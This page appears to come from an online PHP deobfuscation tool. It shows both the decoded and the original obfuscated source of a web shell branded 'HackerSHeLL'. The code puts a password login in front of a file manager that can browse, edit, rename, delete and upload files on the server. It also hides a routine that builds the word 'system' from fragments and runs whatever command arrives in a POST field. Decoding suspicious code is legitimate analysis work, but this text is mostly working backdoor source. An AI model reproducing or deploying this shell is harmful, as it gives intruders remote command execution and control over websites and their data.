Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
goto xaTFb; Ea0A3: if (empty($_GET["\x66\x69\154\145"])) { ?> <table width="100%"><tr><..
Decoded Output download
<? goto xaTFb;
Ea0A3:
if (empty($_GET["file"])) { ?>
<table width="100%"><tr><th class="c"style="border:1px solid #fff">Name File</th><th class="c"style="border:1px solid #fff"colspan="2">Action</th></tr><?php
$scndir = scandir($dir);
foreach ($scndir as $sdir) {
if (is_dir($dir . "/" . $sdir)) {
echo "<tr>\xa <td><a href='?d={$dir}/{$sdir}'><img height='20' src='http://icons.iconarchive.com/icons/paomedia/small-n-flat/1024/folder-icon.png'/> " .
htmlspecialchars($sdir) .
"</a></td>
<td><a href='?file={$dir}/{$sdir}&rename=true'>Rename</a></td>\xa <td><a href='?folder={$dir}/{$sdir}&rmfolder=true'>Delete</a></td>
</tr>\xa ";
}
if (is_file($dir . "/" . $sdir)) {
echo "<tr>\xa <td><a href='?file={$dir}/{$sdir}'><img height='20' src='http://icons.iconarchive.com/icons/zhoolego/material/512/Filetype-Docs-icon.png'/> " .
htmlspecialchars($sdir) .
"</a></td>\xa <td><a href='?file={$dir}/{$sdir}&edit=true'>Edit</a></td>\xa <td><a href='?file={$dir}/{$sdir}&delete=true'>Delete</a></td>
</tr>\xa ";
}
}
?>
</table><?php }
goto YzdzG;
sgVNB:
session_start();
goto Gfdbd;
PN0tu:
if ($_FILES["upd"]) {
if (
copy(
$_FILES["upd"]["tmp_name"],
$dir . "/" . $_FILES["upd"]["name"]
)
) { ?>
<b>Uploaded</b><?php } else { ?>
<b>Failed Upload</b><?php }
}
goto oZuYQ;
Xgxen:
?>
<br><br><form enctype="multipart/form-data"method="post">Upload : <input type="file"name="upd"><input type="submit"value="Upload"><?php
goto PN0tu;
f8ftD:
if (empty($_SESSION["enter"])) { ?>
<html><head><title>hacker </title><link href="https://i.screenshot.net/z7xj4fg"rel="icon"><style>html{background:url();background-size:cover;background-color:#000;background-repeat:no-repeat;background-position:center;background-attachment:fixed;color:#fff}input{background:0 0;color:#0ff;border:1px solid #fff}</style></head><body><table width="100%"height="100%"><td align="center"><font style="color:#0ff"size="10">Hacker</font><br><br>HackerSHeLL<br><font color="red"> <br><br><form enctype="multipart/form-data"method="post"><input type="password"name="passwd"> <input type="submit"name="pass"value="Login"></form></td></table></body></html><?php die();}
goto OvE5M;
OS0vz:
if ($_POST["0"]) {
echo htmlspecialchars(
($_[0][] = @$_POST["0"]) .
($_[1][] = "s") .
($_[1][] = "y") .
($_[1][] = "st") .
($_[1][] = "em") .
($l = @get_defined_vars()["_"][1]) .
($ .= $l[0]) .
($ .= $l[1]) .
($ .= $l[2]) .
($ .= $l[3]) .
$("{$_[0][0]}")
);
} ?>
Did this file decode correctly?
Original Code
goto xaTFb;
Ea0A3:
if (empty($_GET["\x66\x69\154\145"])) { ?>
<table width="100%"><tr><th class="c"style="border:1px solid #fff">Name File</th><th class="c"style="border:1px solid #fff"colspan="2">Action</th></tr><?php
$scndir = scandir($dir);
foreach ($scndir as $sdir) {
if (is_dir($dir . "\57" . $sdir)) {
echo "\74\164\x72\76\xa\40\x20\x20\x20\40\40\x3c\x74\x64\76\x3c\x61\40\x68\162\145\146\75\47\77\x64\75{$dir}\57{$sdir}\x27\x3e\74\x69\x6d\147\40\x68\145\x69\x67\x68\164\75\x27\62\60\x27\x20\x73\162\x63\75\47\150\x74\164\160\x3a\x2f\57\151\x63\x6f\x6e\x73\56\151\143\x6f\156\x61\162\143\150\x69\166\x65\x2e\x63\157\155\57\x69\x63\157\x6e\163\x2f\160\x61\x6f\x6d\145\144\x69\141\x2f\x73\x6d\x61\x6c\x6c\x2d\156\55\x66\154\141\x74\57\x31\60\62\x34\x2f\x66\x6f\x6c\144\x65\162\55\151\x63\157\x6e\x2e\160\156\x67\x27\x2f\76\40" .
htmlspecialchars($sdir) .
"\x3c\57\141\x3e\74\57\x74\144\76\12\40\x20\40\x20\40\40\x3c\164\144\76\74\x61\40\150\x72\x65\146\x3d\x27\77\146\151\x6c\145\75{$dir}\x2f{$sdir}\46\x72\145\156\141\x6d\145\x3d\164\162\x75\x65\47\x3e\x52\x65\156\x61\155\x65\x3c\x2f\x61\x3e\x3c\57\164\144\x3e\xa\x20\40\40\x20\40\40\x3c\164\x64\x3e\x3c\141\x20\150\162\145\146\75\47\77\x66\x6f\x6c\144\x65\x72\75{$dir}\57{$sdir}\x26\x72\155\x66\x6f\x6c\144\145\x72\75\x74\162\165\x65\47\x3e\104\x65\154\x65\x74\x65\x3c\x2f\141\76\x3c\x2f\x74\x64\76\12\40\x20\40\40\x20\x20\74\x2f\164\162\76\xa\40\40\40\x20\40\40";
}
if (is_file($dir . "\57" . $sdir)) {
echo "\74\x74\x72\x3e\xa\40\40\40\40\40\x20\x3c\x74\x64\x3e\74\x61\x20\x68\x72\145\146\x3d\x27\x3f\x66\x69\154\145\x3d{$dir}\57{$sdir}\47\x3e\x3c\151\x6d\147\x20\x68\x65\x69\147\150\x74\x3d\x27\x32\x30\47\40\163\162\143\x3d\x27\x68\x74\x74\x70\72\57\x2f\x69\143\157\x6e\x73\x2e\x69\143\157\x6e\141\x72\143\150\151\x76\145\56\143\x6f\155\x2f\151\143\157\x6e\163\57\172\x68\x6f\x6f\154\145\147\157\x2f\155\141\164\145\162\x69\x61\154\57\65\x31\x32\57\106\x69\154\145\x74\x79\160\145\x2d\x44\x6f\143\163\55\151\143\157\156\56\x70\156\x67\47\x2f\76\40" .
htmlspecialchars($sdir) .
"\x3c\x2f\141\76\74\57\x74\x64\x3e\xa\x20\40\x20\x20\x20\x20\74\164\144\x3e\x3c\141\x20\150\162\145\146\75\47\x3f\x66\x69\154\145\75{$dir}\57{$sdir}\x26\145\144\151\164\x3d\x74\162\165\145\47\76\105\144\x69\164\74\57\141\x3e\74\x2f\164\144\76\xa\x20\40\x20\x20\x20\x20\x3c\x74\144\76\74\141\40\150\x72\145\x66\75\x27\x3f\146\151\x6c\x65\x3d{$dir}\x2f{$sdir}\x26\x64\x65\154\145\x74\145\75\164\162\165\x65\47\x3e\x44\x65\154\145\x74\145\x3c\x2f\x61\76\74\57\164\144\76\12\x20\40\x20\x20\40\x20\x3c\57\x74\162\76\xa\x20\x20\x20\x20\x20\40";
}
}
?>
</table><?php }
goto YzdzG;
sgVNB:
session_start();
goto Gfdbd;
PN0tu:
if ($_FILES["\x75\x70\144"]) {
if (
copy(
$_FILES["\x75\x70\x64"]["\164\155\160\137\156\141\x6d\145"],
$dir . "\x2f" . $_FILES["\165\160\x64"]["\156\141\155\x65"]
)
) { ?>
<b>Uploaded</b><?php } else { ?>
<b>Failed Upload</b><?php }
}
goto oZuYQ;
Xgxen:
?>
<br><br><form enctype="multipart/form-data"method="post">Upload : <input type="file"name="upd"><input type="submit"value="Upload"><?php
goto PN0tu;
f8ftD:
if (empty($_SESSION["\x65\156\x74\145\162"])) { ?>
<html><head><title>hacker </title><link href="https://i.screenshot.net/z7xj4fg"rel="icon"><style>html{background:url();background-size:cover;background-color:#000;background-repeat:no-repeat;background-position:center;background-attachment:fixed;color:#fff}input{background:0 0;color:#0ff;border:1px solid #fff}</style></head><body><table width="100%"height="100%"><td align="center"><font style="color:#0ff"size="10">Hacker</font><br><br>HackerSHeLL<br><font color="red"> <br><br><form enctype="multipart/form-data"method="post"><input type="password"name="passwd"> <input type="submit"name="pass"value="Login"></form></td></table></body></html><?php die();}
goto OvE5M;
OS0vz:
if ($_POST["\x30"]) {
echo htmlspecialchars(
($_[0][] = @$_POST["\x30"]) .
($_[1][] = "\x73") .
($_[1][] = "\x79") .
($_[1][] = "\x73\x74") .
($_[1][] = "\145\x6d") .
($l = @get_defined_vars()["\137"][1]) .
($ .= $l[0]) .
($ .= $l[1]) .
($ .= $l[2]) .
($ .= $l[3]) .
$("{$_[0][0]}")
);
}
Function Calls
None |
Stats
MD5 | a70440639b7a808500d54ed41553a72c |
Eval Count | 0 |
Decode Time | 42 ms |